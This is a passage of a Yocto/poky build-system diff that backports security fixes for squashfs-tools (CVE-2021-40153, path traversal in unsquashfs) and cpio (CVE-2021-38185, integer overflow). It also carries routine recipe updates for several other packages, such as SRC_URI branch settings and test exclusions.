b/poky/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch @@ -0,0 +1,253 @@ +Backport patch to fix CVE-2021-40153, and remove version update in unsquashfs.c +for compatible. + +Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/79b5a55] +CVE: CVE-2021-40153 + +Signed-off-by: Kai Kang + +From 79b5a555058eef4e1e7ff220c344d39f8cd09646 Mon Sep 17 00:00:00 2001 +From: Phillip Lougher +Date: Sat, 16 Jan 2021 20:08:55 +0000 +Subject: [PATCH] Unsquashfs: fix write outside destination directory exploit + +An issue on Github (https://github.com/plougher/squashfs-tools/issues/72) +shows how some specially crafted Squashfs filesystems containing +invalid file names (with '/' and ..) can cause Unsquashfs to write +files outside of the destination directory. + +This commit fixes this exploit by checking all names for +validity. + +In doing so I have also added checks for '.' and for names that +are shorter than they should be (names in the file system should +not have '\0' terminators). + +Signed-off-by: Phillip Lougher +--- + squashfs-tools/Makefile | 5 ++- + squashfs-tools/unsquash-1.c | 9 +++++- + squashfs-tools/unsquash-1234.c | 58 ++++++++++++++++++++++++++++++++++ + squashfs-tools/unsquash-2.c | 9 +++++- + squashfs-tools/unsquash-3.c | 9 +++++- + squashfs-tools/unsquash-4.c | 9 +++++- + squashfs-tools/unsquashfs.h | 5 ++- + 7 files changed, 98 insertions(+), 6 deletions(-) + create mode 100644 squashfs-tools/unsquash-1234.c + +diff --git a/squashfs-tools/Makefile b/squashfs-tools/Makefile +index aee4b960..20feaca2 100644 +--- a/squashfs-tools/Makefile ++++ b/squashfs-tools/Makefile +@@ -156,7 +156,8 @@ MKSQUASHFS_OBJS = mksquashfs.o read_fs.o action.o swap.o pseudo.o compressor.o \ + caches-queues-lists.o + + UNSQUASHFS_OBJS = unsquashfs.o unsquash-1.o unsquash-2.o unsquash-3.o \ +- unsquash-4.o unsquash-123.o unsquash-34.o swap.o compressor.o unsquashfs_info.o ++ unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o swap.o \ ++ compressor.o unsquashfs_info.o + + CFLAGS ?= -O2 + CFLAGS += $(EXTRA_CFLAGS) $(INCLUDEDIR) -D_FILE_OFFSET_BITS=64 \ +@@ -350,6 +351,8 @@ unsquash-123.o: unsquashfs.h unsquash-123.c squashfs_fs.h squashfs_compat.h + + unsquash-34.o: unsquashfs.h unsquash-34.c + ++unsquash-1234.o: unsquash-1234.c ++ + unsquashfs_xattr.o: unsquashfs_xattr.c unsquashfs.h squashfs_fs.h xattr.h + + unsquashfs_info.o: unsquashfs.h squashfs_fs.h +diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c +index 34eced36..28326cb1 100644 +--- a/squashfs-tools/unsquash-1.c ++++ b/squashfs-tools/unsquash-1.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2011, 2012, 2019 ++ * Copyright (c) 2009, 2010, 2011, 2012, 2019, 2021 + * Phillip Lougher + * + * This program is free software; you can redistribute it and/or +@@ -285,6 +285,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) */ ++ if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c +new file mode 100644 +index 00000000..c2d4f42b +--- /dev/null ++++ b/squashfs-tools/unsquash-1234.c +@@ -0,0 +1,58 @@ ++/* ++ * Unsquash a squashfs filesystem. This is a highly compressed read only ++ * filesystem. ++ * ++ * Copyright (c) 2021 ++ * Phillip Lougher ++ * ++ * This program is free software; you can redistribute it and/or ++ * modify it under the terms of the GNU General Public License ++ * as published by the Free Software Foundation; either version 2, ++ * or (at your option) any later version. ++ * ++ * This program is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ++ * GNU General Public License for more details. ++ * ++ * You should have received a copy of the GNU General Public License ++ * along with this program; if not, write to the Free Software ++ * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. ++ * ++ * unsquash-1234.c ++ * ++ * Helper functions used by unsquash-1, unsquash-2, unsquash-3 and ++ * unsquash-4. ++ */ ++ ++#define TRUE 1 ++#define FALSE 0 ++/* ++ * Check name for validity, name should not ++ * - be ".", "./", or ++ * - be "..", "../" or ++ * - have a "/" anywhere in the name, or ++ * - be shorter than the expected size ++ */ ++int check_name(char *name, int size) ++{ ++ char *start = name; ++ ++ if(name[0] == '.') { ++ if(name[1] == '.') ++ name++; ++ if(name[1] == '/' || name[1] == '\0') ++ return FALSE; ++ } ++ ++ while(name[0] != '/' && name[0] != '\0') ++ name ++; ++ ++ if(name[0] == '/') ++ return FALSE; ++ ++ if((name - start) != size) ++ return FALSE; ++ ++ return TRUE; ++} +diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c +index 4b3d767e..474064e1 100644 +--- a/squashfs-tools/unsquash-2.c ++++ b/squashfs-tools/unsquash-2.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2013, 2019 ++ * Copyright (c) 2009, 2010, 2013, 2019, 2021 + * Phillip Lougher + * + * This program is free software; you can redistribute it and/or +@@ -386,6 +386,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) */ ++ if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c +index 02c31fc5..65cfe4d9 100644 +--- a/squashfs-tools/unsquash-3.c ++++ b/squashfs-tools/unsquash-3.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019 ++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021 + * Phillip Lougher + * + * This program is free software; you can redistribute it and/or +@@ -413,6 +413,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) */ ++ if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c +index 8475835c..aa23a841 100644 +--- a/squashfs-tools/unsquash-4.c ++++ b/squashfs-tools/unsquash-4.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019 ++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021 + * Phillip Lougher + * + * This program is free software; you can redistribute it and/or +@@ -349,6 +349,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) */ ++ if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h +index 934618b2..db1da7a0 100644 +--- a/squashfs-tools/unsquashfs.h ++++ b/squashfs-tools/unsquashfs.h +@@ -4,7 +4,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2013, 2014, 2019 ++ * Copyright (c) 2009, 2010, 2013, 2014, 2019, 2021 + * Phillip Lougher + * + * This program is free software; you can redistribute it and/or +@@ -261,4 +261,7 @@ extern int read_ids(int, long long, long long, unsigned int **); + + /* unsquash-34.c */ + extern long long *alloc_index_table(int); ++ ++/* unsquash-1234.c */ ++extern int check_name(char *, int); + #endif diff --git a/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb b/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb index 2b1409d78d..5d754b20b3 100644 --- a/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb +++ b/poky/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb @@ -9,8 +9,9 @@ LIC_FILES_CHKSUM = "file://../COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" PV = "4.4" SRCREV = "52eb4c279cd283ed9802dd1ceb686560b22ffb67" -SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https \ +SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https;branch=master \ file://0001-squashfs-tools-fix-build-failure-against-gcc-10.patch;striplevel=2 \ + file://CVE-2021-40153.patch;striplevel=2 \ " S = "${WORKDIR}/git/squashfs-tools" diff --git a/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb b/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb index aafe7c72a0..e1233ffde0 100644 --- a/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb +++ b/poky/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb @@ -8,7 +8,7 @@ LICENSE = "LGPLv2.1 & GPLv2" LIC_FILES_CHKSUM = "file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c \ file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe" -SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https \ +SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https;branch=master \ file://0001-architecture-Recognise-RISCV-32-RISCV-64.patch \ file://mips64.patch \ " diff --git a/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb b/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb index 44a0d227ec..b671956cc8 100644 --- a/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb +++ b/poky/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb @@ -10,7 +10,7 @@ SRCREV = "a022ef2f1acfd9209a1bf792dda14ae4b0d1b60f" PV = "1.7.0+git${SRCPV}" UPSTREAM_CHECK_GITTAGREGEX = "(?P(\d+(\.\d+)+))" -SRC_URI = "git://git.eclipse.org/gitroot/tcf/org.eclipse.tcf.agent \ +SRC_URI = "git://git.eclipse.org/r/tcf/org.eclipse.tcf.agent.git;protocol=https;branch=master \ file://fix_ranlib.patch \ file://ldflags.patch \ file://tcf-agent.init \ diff --git a/poky/meta/recipes-devtools/unfs3/unfs3_git.bb b/poky/meta/recipes-devtools/unfs3/unfs3_git.bb index b1882defa2..d1b3fb8f57 100644 --- a/poky/meta/recipes-devtools/unfs3/unfs3_git.bb +++ b/poky/meta/recipes-devtools/unfs3/unfs3_git.bb @@ -14,7 +14,7 @@ DEPENDS_append_class-nativesdk = " flex-nativesdk" ASNEEDED = "" S = "${WORKDIR}/git" -SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https \ +SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https;branch=master \ file://unfs3_parallel_build.patch \ file://alternate_rpc_ports.patch \ file://fix_pid_race_parent_writes_child_pid.patch \ diff --git a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 index 93bfd45a4e..afa6a94825 100644 --- a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 +++ b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 @@ -120,6 +120,7 @@ drd/tests/tc19_shadowmem drd/tests/tc21_pthonce drd/tests/tc22_exit_w_lock drd/tests/tc23_bogus_condwait +gdbserver_tests/hginfo helgrind/tests/annotate_rwlock helgrind/tests/annotate_smart_pointer helgrind/tests/bar_bad diff --git a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all index d6a85c4735..9b8db093df 100644 --- a/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all +++ b/poky/meta/recipes-devtools/valgrind/valgrind/remove-for-all @@ -1,2 +1,3 @@ drd/tests/bar_bad drd/tests/bar_bad_xml +gdbserver_tests/hginfo diff --git a/poky/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch b/poky/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch new file mode 100644 index 0000000000..14c1cd806e --- /dev/null +++ b/poky/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch @@ -0,0 +1,42 @@ +From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= +Date: Fri, 30 Oct 2020 15:10:35 +0100 +Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151) + +Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f + +Slightly modified to cleanly apply to asciidoc 8.6.9: +- VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9 +- line numbers corrected to eliminate offset warnings + +Upstream-Status: Backport +Signed-off-by: Steve Sakoman + +--- + asciidoc.py | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/asciidoc.py b/asciidoc.py +index f960e7d8..42868c4b 100755 +--- a/asciidoc.py ++++ b/asciidoc.py +@@ -30,7 +30,7 @@ + # Used by asciidocapi.py # + VERSION = '8.6.10' # See CHANGELOG file for version history. + +-MIN_PYTHON_VERSION = '3.4' # Require this version of Python or better. ++MIN_PYTHON_VERSION = (3, 4) # Require this version of Python or better. + + # --------------------------------------------------------------------------- + # Program constants. +@@ -4704,8 +4704,8 @@ def init(self, cmd): + directory. + cmd is the asciidoc command or asciidoc.py path. + """ +- if float(sys.version[:3]) < float(MIN_PYTHON_VERSION): +- message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION) ++ if sys.version_info[:2] < MIN_PYTHON_VERSION: ++ message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION) + sys.exit(1) + if not os.path.exists(cmd): + message.stderr('FAILED: Missing asciidoc command: %s' % cmd) diff --git a/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb b/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb index 932339f739..62738dc8d9 100644 --- a/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb +++ b/poky/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb @@ -9,7 +9,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \ file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069" SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https;branch=main \ - file://auto-catalogs.patch" + file://auto-catalogs.patch \ + file://detect-python-version.patch" SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0" PV .= "+py3-git${SRCPV}" diff --git a/poky/meta/recipes-extended/bash/bash.inc b/poky/meta/recipes-extended/bash/bash.inc index c7cf8cddd3..4e6176d2e6 100644 --- a/poky/meta/recipes-extended/bash/bash.inc +++ b/poky/meta/recipes-extended/bash/bash.inc @@ -49,6 +49,11 @@ do_compile_ptest () { oe_runmake buildtest } +do_install_prepend () { + # Ensure determinism as this counter increases for each make call + rm -f ${B}/.build +} + do_install_append () { # Move /usr/bin/bash to /bin/bash, if need if [ "${base_bindir}" != "${bindir}" ]; then diff --git a/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am b/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am index dcf64584d9..adc85a62b2 100644 --- a/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am +++ b/poky/meta/recipes-extended/bzip2/bzip2/Makefile.am @@ -1,6 +1,6 @@ lib_LTLIBRARIES = libbz2.la -libbz2_la_LDFLAGS = -version-info 1:6:0 +libbz2_la_LDFLAGS = -version-info 1:8:0 libbz2_la_SOURCES = blocksort.c \ huffman.c \ diff --git a/poky/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/poky/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch new file mode 100644 index 0000000000..6ceafeee49 --- /dev/null +++ b/poky/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch @@ -0,0 +1,581 @@ +GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted +pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers +an out-of-bounds heap write. + +CVE: CVE-2021-38185 +Upstream-Status: Backport +Signed-off-by: Ross Burton + +From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff +Date: Sat, 7 Aug 2021 12:52:21 +0300 +Subject: [PATCH 1/3] Rewrite dynamic string support. + +* src/dstring.c (ds_init): Take a single argument. +(ds_free): New function. +(ds_resize): Take a single argument. Use x2nrealloc to expand +the storage. +(ds_reset,ds_append,ds_concat,ds_endswith): New function. +(ds_fgetstr): Rewrite. In particular, this fixes integer overflow. +* src/dstring.h (dynamic_string): Keep both the allocated length +(ds_size) and index of the next free byte in the string (ds_idx). +(ds_init,ds_resize): Change signature. +(ds_len): New macro. +(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos. +* src/copyin.c: Use new ds_ functions. +* src/copyout.c: Likewise. +* src/copypass.c: Likewise. +* src/util.c: Likewise. +--- + src/copyin.c | 40 +++++++++++------------ + src/copyout.c | 16 ++++----- + src/copypass.c | 34 +++++++++---------- + src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++-------------- + src/dstring.h | 31 +++++++++--------- + src/util.c | 6 ++-- + 6 files changed, 123 insertions(+), 92 deletions(-) + +diff --git a/src/copyin.c b/src/copyin.c +index b29f348..37e503a 100644 +--- a/src/copyin.c ++++ b/src/copyin.c +@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out, + char *str_res; /* Result for string function. */ + static dynamic_string new_name; /* New file name for rename option. */ + static int initialized_new_name = false; ++ + if (!initialized_new_name) +- { +- ds_init (&new_name, 128); +- initialized_new_name = true; +- } ++ { ++ ds_init (&new_name); ++ initialized_new_name = true; ++ } + + if (rename_flag) + { +@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name) + already in `save_patterns' (from the command line) are preserved. */ + + static void +-read_pattern_file () ++read_pattern_file (void) + { +- int max_new_patterns; +- char **new_save_patterns; +- int new_num_patterns; ++ char **new_save_patterns = NULL; ++ size_t max_new_patterns; ++ size_t new_num_patterns; + int i; +- dynamic_string pattern_name; ++ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER; + FILE *pattern_fp; + + if (num_patterns < 0) + num_patterns = 0; +- max_new_patterns = 1 + num_patterns; +- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *)); + new_num_patterns = num_patterns; +- ds_init (&pattern_name, 128); ++ max_new_patterns = num_patterns; ++ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0])); + + pattern_fp = fopen (pattern_file_name, "r"); + if (pattern_fp == NULL) + open_fatal (pattern_file_name); + while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL) + { +- if (new_num_patterns >= max_new_patterns) +- { +- max_new_patterns += 1; +- new_save_patterns = (char **) +- xrealloc ((char *) new_save_patterns, +- max_new_patterns * sizeof (char *)); +- } ++ if (new_num_patterns == max_new_patterns) ++ new_save_patterns = x2nrealloc (new_save_patterns, ++ &max_new_patterns, ++ sizeof (new_save_patterns[0])); + new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string); + ++new_num_patterns; + } ++ ++ ds_free (&pattern_name); ++ + if (ferror (pattern_fp) || fclose (pattern_fp) == EOF) + close_error (pattern_file_name); + +@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count) + in the file system. */ + + void +-process_copy_in () ++process_copy_in (void) + { + char done = false; /* True if trailer reached. */ + FILE *tty_in = NULL; /* Interactive file for rename option. */ +diff --git a/src/copyout.c b/src/copyout.c +index 8b0beb6..26e3dda 100644 +--- a/src/copyout.c ++++ b/src/copyout.c +@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value) + The format of the header depends on the compatibility (-c) flag. */ + + void +-process_copy_out () ++process_copy_out (void) + { +- dynamic_string input_name; /* Name of file read from stdin. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file read from stdin. */ + struct stat file_stat; /* Stat record for file. */ + struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER; + /* Output header information. */ +@@ -605,7 +606,6 @@ process_copy_out () + char *orig_file_name = NULL; + + /* Initialize the copy out. */ +- ds_init (&input_name, 128); + file_hdr.c_magic = 070707; + + /* Check whether the output file might be a tape. */ +@@ -657,14 +657,9 @@ process_copy_out () + { + if (file_hdr.c_mode & CP_IFDIR) + { +- int len = strlen (input_name.ds_string); + /* Make sure the name ends with a slash */ +- if (input_name.ds_string[len-1] != '/') +- { +- ds_resize (&input_name, len + 2); +- input_name.ds_string[len] = '/'; +- input_name.ds_string[len+1] = 0; +- } ++ if (!ds_endswith (&input_name, '/')) ++ ds_append (&input_name, '/'); + } + } + +@@ -875,6 +870,7 @@ process_copy_out () + (unsigned long) blocks), (unsigned long) blocks); + } + cpio_file_stat_free (&file_hdr); ++ ds_free (&input_name); + } + + +diff --git a/src/copypass.c b/src/copypass.c +index dc13b5b..62f31c6 100644 +--- a/src/copypass.c ++++ b/src/copypass.c +@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st) + If `link_flag', link instead of copying. */ + + void +-process_copy_pass () ++process_copy_pass (void) + { +- dynamic_string input_name; /* Name of file from stdin. */ +- dynamic_string output_name; /* Name of new file. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file from stdin. */ ++ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of new file. */ + size_t dirname_len; /* Length of `directory_name'. */ + int res; /* Result of functions. */ + char *slash; /* For moving past slashes in input name. */ +@@ -65,25 +67,18 @@ process_copy_pass () + created files */ + + /* Initialize the copy pass. */ +- ds_init (&input_name, 128); + + dirname_len = strlen (directory_name); + if (change_directory_option && !ISSLASH (directory_name[0])) + { + char *pwd = xgetcwd (); +- +- dirname_len += strlen (pwd) + 1; +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, pwd); +- strcat (output_name.ds_string, "/"); +- strcat (output_name.ds_string, directory_name); ++ ++ ds_concat (&output_name, pwd); ++ ds_append (&output_name, '/'); + } +- else +- { +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, directory_name); +- } +- output_name.ds_string[dirname_len] = '/'; ++ ds_concat (&output_name, directory_name); ++ ds_append (&output_name, '/'); ++ dirname_len = ds_len (&output_name); + output_is_seekable = true; + + change_dir (); +@@ -116,8 +111,8 @@ process_copy_pass () + /* Make the name of the new file. */ + for (slash = input_name.ds_string; *slash == '/'; ++slash) + ; +- ds_resize (&output_name, dirname_len + strlen (slash) + 2); +- strcpy (output_name.ds_string + dirname_len + 1, slash); ++ ds_reset (&output_name, dirname_len); ++ ds_concat (&output_name, slash); + + existing_dir = false; + if (lstat (output_name.ds_string, &out_file_stat) == 0) +@@ -333,6 +328,9 @@ process_copy_pass () + (unsigned long) blocks), + (unsigned long) blocks); + } ++ ++ ds_free (&input_name); ++ ds_free (&output_name); + } + + /* Try and create a hard link from FILE_NAME to another file +diff --git a/src/dstring.c b/src/dstring.c +index e9c063f..358f356 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -20,8 +20,8 @@ + #if defined(HAVE_CONFIG_H) + # include + #endif +- + #include ++#include + #if defined(HAVE_STRING_H) || defined(STDC_HEADERS) + #include + #else +@@ -33,24 +33,41 @@ + /* Initialiaze dynamic string STRING with space for SIZE characters. */ + + void +-ds_init (dynamic_string *string, int size) ++ds_init (dynamic_string *string) ++{ ++ memset (string, 0, sizeof *string); ++} ++ ++/* Free the dynamic string storage. */ ++ ++void ++ds_free (dynamic_string *string) + { +- string->ds_length = size; +- string->ds_string = (char *) xmalloc (size); ++ free (string->ds_string); + } + +-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */ ++/* Expand dynamic string STRING, if necessary. */ + + void +-ds_resize (dynamic_string *string, int size) ++ds_resize (dynamic_string *string) + { +- if (size > string->ds_length) ++ if (string->ds_idx == string->ds_size) + { +- string->ds_length = size; +- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size); ++ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, ++ 1); + } + } + ++/* Reset the index of the dynamic string S to LEN. */ ++ ++void ++ds_reset (dynamic_string *s, size_t len) ++{ ++ while (len > s->ds_size) ++ ds_resize (s); ++ s->ds_idx = len; ++} ++ + /* Dynamic string S gets a string terminated by the EOS character + (which is removed) from file F. S will increase + in size during the function if the string from F is longer than +@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size) + char * + ds_fgetstr (FILE *f, dynamic_string *s, char eos) + { +- int insize; /* Amount needed for line. */ +- int strsize; /* Amount allocated for S. */ + int next_ch; + + /* Initialize. */ +- insize = 0; +- strsize = s->ds_length; ++ s->ds_idx = 0; + + /* Read the input string. */ +- next_ch = getc (f); +- while (next_ch != eos && next_ch != EOF) ++ while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- if (insize >= strsize - 1) +- { +- ds_resize (s, strsize * 2 + 2); +- strsize = s->ds_length; +- } +- s->ds_string[insize++] = next_ch; +- next_ch = getc (f); ++ ds_resize (s); ++ s->ds_string[s->ds_idx++] = next_ch; + } +- s->ds_string[insize++] = '\0'; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = '\0'; + +- if (insize == 1 && next_ch == EOF) ++ if (s->ds_idx == 0 && next_ch == EOF) + return NULL; + else + return s->ds_string; + } + ++void ++ds_append (dynamic_string *s, int c) ++{ ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = c; ++ if (c) ++ { ++ s->ds_idx++; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = 0; ++ } ++} ++ ++void ++ds_concat (dynamic_string *s, char const *str) ++{ ++ size_t len = strlen (str); ++ while (len + 1 > s->ds_size) ++ ds_resize (s); ++ memcpy (s->ds_string + s->ds_idx, str, len); ++ s->ds_idx += len; ++ s->ds_string[s->ds_idx] = 0; ++} ++ + char * + ds_fgets (FILE *f, dynamic_string *s) + { +@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s) + { + return ds_fgetstr (f, s, '\0'); + } ++ ++/* Return true if the dynamic string S ends with character C. */ ++int ++ds_endswith (dynamic_string *s, int c) ++{ ++ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c); ++} +diff --git a/src/dstring.h b/src/dstring.h +index b5135fe..f5b04ef 100644 +--- a/src/dstring.h ++++ b/src/dstring.h +@@ -17,10 +17,6 @@ + Software Foundation, Inc., 51 Franklin Street, Fifth Floor, + Boston, MA 02110-1301 USA. */ + +-#ifndef NULL +-#define NULL 0 +-#endif +- + /* A dynamic string consists of record that records the size of an + allocated string and the pointer to that string. The actual string + is a normal zero byte terminated string that can be used with the +@@ -30,22 +26,25 @@ + + typedef struct + { +- int ds_length; /* Actual amount of storage allocated. */ +- char *ds_string; /* String. */ ++ size_t ds_size; /* Actual amount of storage allocated. */ ++ size_t ds_idx; /* Index of the next free byte in the string. */ ++ char *ds_string; /* String storage. */ + } dynamic_string; + ++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL } + +-/* Macros that look similar to the original string functions. +- WARNING: These macros work only on pointers to dynamic string records. +- If used with a real record, an "&" must be used to get the pointer. */ +-#define ds_strlen(s) strlen ((s)->ds_string) +-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string) +-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n) +-#define ds_index(s, c) index ((s)->ds_string, c) +-#define ds_rindex(s, c) rindex ((s)->ds_string, c) ++void ds_init (dynamic_string *string); ++void ds_free (dynamic_string *string); ++void ds_reset (dynamic_string *s, size_t len); + +-void ds_init (dynamic_string *string, int size); +-void ds_resize (dynamic_string *string, int size); ++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */ + char *ds_fgetname (FILE *f, dynamic_string *s); + char *ds_fgets (FILE *f, dynamic_string *s); + char *ds_fgetstr (FILE *f, dynamic_string *s, char eos); ++void ds_append (dynamic_string *s, int c); ++void ds_concat (dynamic_string *s, char const *str); ++ ++#define ds_len(s) ((s)->ds_idx) ++ ++int ds_endswith (dynamic_string 